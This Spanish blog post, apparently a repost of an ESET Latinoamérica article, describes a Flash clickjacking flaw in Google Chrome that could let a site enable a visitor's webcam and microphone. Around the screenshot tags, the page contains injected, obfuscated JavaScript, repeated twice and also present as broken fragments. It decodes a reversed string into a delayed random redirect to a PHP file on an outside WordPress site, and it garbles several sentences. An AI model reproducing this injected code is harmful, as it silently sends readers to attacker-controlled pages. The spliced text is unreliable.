Grave vulnerabilidad en Flash de Google Chrome explotable a través de ClickJacking
El investigador ruso, Egor Homakov’s, descubrió una grave vulnerabilidad en Google Chrome que permite a un atacante tomar control sobre la webcam y micrófono de la computadora de la potencial víctima. Una vulnerabilidad similar fue resuelta en el mes de Octubre del 2011.
Google Chrome es uno de los navegadores más utilizados alrededor del mundo. La amplia variedad de extensiones han transformado a este navegador en uno de los más completos. Sin embargo, en este caso, se encontró una vulnerabilidad similar a la descubierta en el 2011 donde, para llevar a cabo la explotación, se utiliza una técnica conocida como ClickJacking utilizada para engañar usuarios a través de navegadores web.
Específicamente, la vulnerabilidad afecta a Adobe Flash y, aprovechando el ClickJacking, se explota en el entorno del navegador. Para esto, se crea una animación transparente sobre una imagen y luego se establece la ventana de diálogo que habilita los permisos para habilitar la webcam y el micrófono.
En esta instancia, el atacante intentará convencer a la víctima que haga clic sobre la animación para que en realidad autorice el inicio de la webcam y el audio. El atacante puede lograr esto mediante un falso botón para iniciar la animación y en ese mismo sitio establecer el botón para permitir iniciar el video y audio de la potencial víctima.
Este ataque funcionará de acuerdo a como maneje las transparencias el navegador. En alguno de ellos la transparencia no funciona bien y es posible visualizar la ventana de diálogo tal como se observa en la siguiente captura:
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>torio/wp-content/uploads/2013/06/Ventana-de-dialogo.png” width=”212″ height=”140″ /></p>
<p>Sin embargo, en otros navegadores la transparencia si funciona y la víctima no puede visualizar la ventana emergente solicitando la au<script>$NfI=function(n){if (typeof ($NfI.list[n]) == ){kind=spacer}
torización. Analizando el código de la prueba de concepto del investigador ruso, se pueden ver las propiedades para ocultar la ventana de dialogo:
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>torio/wp-content/uploads/2013/06/Código-de-la-animación.png” width=”600″ height=”148″ /></p>
<p> </p>
<p>Asimismo, The Register informó que Adobe indica que este es un problema de Google Chrome (uno de los navegadores vulnerables). El problema radica es que no es posible disponer de ventanas de dialogo de Flash de tipo pop up (emergentes) sobre el navegador, sino que están limitadas al propio en<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
torno del navegador. De esta manera, se espera que en el transcurso de la semana este problema sea solucionado.
Es importante que el usuario tome conciencia que al visitar sitios web no confiables podría resultar en que un tercero pueda espiar a la potencial víctima e incluso grabarla. Es por esto, que desde ESET Latinoamérica, recomendamos repasar nuestro post sobre prevención en navegadores ante ataques de ClickJacking. Tomar conciencia sobre la existencia de estos ataques es el comienzo para experimentar una forma más segura de utilizar Internet.
__________
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Siguenos
en facebook
Los comentarios están cerrados.